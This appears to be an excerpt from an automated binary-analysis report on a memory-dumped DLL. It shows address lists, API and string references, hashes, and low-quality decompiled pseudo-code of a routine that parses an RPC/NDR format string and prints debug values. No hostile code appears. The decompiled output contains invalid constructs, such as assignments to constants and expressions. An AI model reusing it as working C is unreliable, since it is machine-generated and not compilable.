                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf
                                                                                                0x6eda9acb

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAAFA0: RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001,?,?,?,?,?,?,6EDA3C70,?,00000000), ref: 6EDAAFE9
                                                                                                  • Part of subcall function 6EDAAFA0: _memmove.LIBCMT ref: 6EDAB016
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA965D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p$uint3264=%ld => %p
                                                                                                • API String ID: 2890701851-2779847962
                                                                                                • Opcode ID: 91dc30ace4578db897f5f5b124e17652c052e7b06e83424102b8971a37f79eec
                                                                                                • Instruction ID: c90cdc3e8ddc39ef3e113c03e33589df25f4a8d02b3c313c200274e5c2a8ffda
                                                                                                • Opcode Fuzzy Hash: 91dc30ace4578db897f5f5b124e17652c052e7b06e83424102b8971a37f79eec
                                                                                                • Instruction Fuzzy Hash: 48D139B5A00108AFCB04CF99E890EEA77B9AF89314F04C519FA594F345E731EA51CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA96A8(void* __eflags) {
                                                                                                				void* _t220;
                                                                                                				void* _t222;
                                                                                                				void* _t224;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					E6EDAAFA0( *((intOrPtr*)(_t220 + 8)), _t220 - 0x24, 4);
                                                                                                					 *( *(_t220 + 0xc)) =  *(_t220 - 0x24);
                                                                                                					0x6eda0000("int3264=%ld => %p\n",  *( *(_t220 + 0xc)),  *(_t220 + 0xc));
                                                                                                					_t224 = _t222 + 0x18;
                                                                                                					 *(_t220 + 0xc) =  &(( *(_t220 + 0xc))[2]);
                                                                                                					while(1) {
                                                                                                						L47:
                                                                                                						 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                						L1:
                                                                                                						while(( *( *(_t220 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                							 *(_t220 - 0xc) =  *( *(_t220 + 0x10)) & 0x000000ff;
                                                                                                							 *(_t220 - 0xc) =  *(_t220 - 0xc) - 1;
                                                                                                							if( *(_t220 - 0xc) > 0xb8) {
                                                                                                								L46:
                                                                                                								0x6eda0000("unhandled format %d\n",  *( *(_t220 + 0x10)) & 0x000000ff);
                                                                                                								_t224 = _t224 + 8;
                                                                                                								while(1) {
                                                                                                									L47:
                                                                                                									 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								}
                                                                                                							}
                                                                                                							L3:
                                                                                                							_t16 =  *(_t220 - 0xc) + 0x6eda9b24; // 0xcccccc0f
                                                                                                							switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
                                                                                                								case 0:
                                                                                                									L4:
                                                                                                									E6EDAAFA0( *((intOrPtr*)(_t220 + 8)),  *(_t220 + 0xc), 1);
                                                                                                									_push( *(_t220 + 0xc));
                                                                                                									_push( *( *(_t220 + 0xc)) & 0x0000ffff);
                                                                                                									_push("byte=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									_t224 = _t224 + 0x18;
                                                                                                									 *(_t220 + 0xc) =  &(( *(_t220 + 0xc))[0]);
                                                                                                									L47:
                                                                                                									 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								case 1:
                                                                                                									L5:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                									_push("short=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 2;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 2:
                                                                                                									L9:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("long=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 3:
                                                                                                									L11:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									asm("cvtss2sd xmm0, [eax]");
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("float=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 4:
                                                                                                									L12:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__edx + 4);
                                                                                                									_push(__eax);
                                                                                                									__ecx =  *__edx;
                                                                                                									_push(__ecx);
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									_push(__eax);
                                                                                                									_push("longlong=%s => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 5:
                                                                                                									L13:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd xmm0, [eax]");
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("double=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 6:
                                                                                                									L6:
                                                                                                									__edx = __ebp - 4;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                                									__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("enum16=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                										_push(0x6f5);
                                                                                                										__imp__RpcRaiseException();
                                                                                                									}
                                                                                                									L8:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 7:
                                                                                                									L14:
                                                                                                									 *(__ebp - 0x1c) = 0;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									_push("pointer => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 0x14);
                                                                                                									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(__ecx != 0x11) {
                                                                                                										 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                                										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__eax + 4);
                                                                                                									 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                										__ecx =  *(__ebp + 0x14);
                                                                                                										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 0x34);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                										 *(__ebp - 0x1c) = 1;
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp - 0x20);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
                                                                                                									if( *(__ebp - 0x1c) == 0) {
                                                                                                										L28:
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                											__edx =  *(__ebp + 0x10);
                                                                                                											__edx =  *(__ebp + 0x10) + 4;
                                                                                                											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                										} else {
                                                                                                											__ecx =  *(__ebp + 0x14);
                                                                                                											__ecx =  *(__ebp + 0x14) + 4;
                                                                                                											 *(__ebp + 0x14) = __ecx;
                                                                                                										}
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										while(1) {
                                                                                                											L47:
                                                                                                											 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                											goto L1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										do {
                                                                                                											L23:
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 0x14);
                                                                                                											_push( *(__edx + 0x14));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                											_push("buffer=%d/%d\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 0xc;
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *( *(__ebp + 8));
                                                                                                											__ecx =  *(__eax + 8);
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__edx =  *( *(__ebp + 8));
                                                                                                												__eax =  *(__edx + 8);
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                												__edx =  *(__ebp + 8);
                                                                                                												__ecx =  *(__edx + 4);
                                                                                                												__ecx =  *(__edx + 4) - __eax;
                                                                                                												_push( *(__edx + 4) - __eax);
                                                                                                												_push("buffer overflow %d bytes\n");
                                                                                                												0x6eda0000();
                                                                                                												__esp = __esp + 8;
                                                                                                											}
                                                                                                											__edx = 0;
                                                                                                										} while (0 != 0);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 4);
                                                                                                										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp - 0x20);
                                                                                                										 *( *(__ebp + 8) + 4) = __ecx;
                                                                                                										__edx =  *(__ebp + 0x14);
                                                                                                										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                										goto L28;
                                                                                                									}
                                                                                                								case 8:
                                                                                                									L32:
                                                                                                									__ecx =  *(__ebp - 0x10);
                                                                                                									__edx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 9:
                                                                                                									L33:
                                                                                                									__eax =  *(__ebp - 0x10);
                                                                                                									__ecx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xa:
                                                                                                									L34:
                                                                                                									__edx =  *(__ebp - 0x10);
                                                                                                									__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xb:
                                                                                                									L35:
                                                                                                									__ecx =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                									 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
                                                                                                									__ecx =  *(__ebp + 0x10);
                                                                                                									__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xc:
                                                                                                									L36:
                                                                                                									1 = 1 << 0;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									__edx =  *(__ebp - 8);
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp - 0x18);
                                                                                                									_push( *(__ebp - 0x18));
                                                                                                									_push("embedded complex (size=%d) => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
                                                                                                										__ecx =  *(__ebp - 0x18);
                                                                                                										__edx =  *(__ebp + 0xc);
                                                                                                										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                                									}
                                                                                                									__eax =  *(__ebp - 8);
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x7f;
                                                                                                									__edx =  *(0x6edbb418 + __ecx * 4);
                                                                                                									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
                                                                                                									if( *(__ebp - 0x14) == 0) {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                                										_push("no unmarshaller for embedded type %02x\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp - 8);
                                                                                                										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax = __ebp + 0xc;
                                                                                                											_push(__ebp + 0xc);
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										} else {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax =  *(__ebp + 0xc);
                                                                                                											_push( *(__ebp + 0xc));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										}
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									goto L1;
                                                                                                								case 0xd:
                                                                                                									L45:
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xe:
                                                                                                									goto L0;
                                                                                                								case 0xf:
                                                                                                									L10:
                                                                                                									__ecx = __ebp - 0x28;
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp - 0x28);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									_push(__ecx);
                                                                                                									_push("uint3264=%ld => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t220 + 0x10) =  &(( *(_t220 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0x10:
                                                                                                									goto L46;
                                                                                                							}
                                                                                                						}
                                                                                                						return  *(_t220 + 0xc);
                                                                                                					}
                                                                                                				}
                                                                                                			}






                                                                                                0x6eda977f
                                                                                                0x6eda9782
                                                                                                0x6eda9783
                                                                                                0x6eda9785
                                                                                                0x6eda9786
                                                                                                0x6eda978b
                                                                                                0x6eda978e
                                                                                                0x6eda978f
                                                                                                0x6eda9794
                                                                                                0x6eda9799
                                                                                                0x6eda979f
                                                                                                0x6eda97a2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97aa
                                                                                                0x6eda97ac
                                                                                                0x6eda97b0
                                                                                                0x6eda97b4
                                                                                                0x6eda97bc
                                                                                                0x6eda97bf
                                                                                                0x6eda97c0
                                                                                                0x6eda97c3
                                                                                                0x6eda97c6
                                                                                                0x6eda97ca
                                                                                                0x6eda97cf
                                                                                                0x6eda97d4
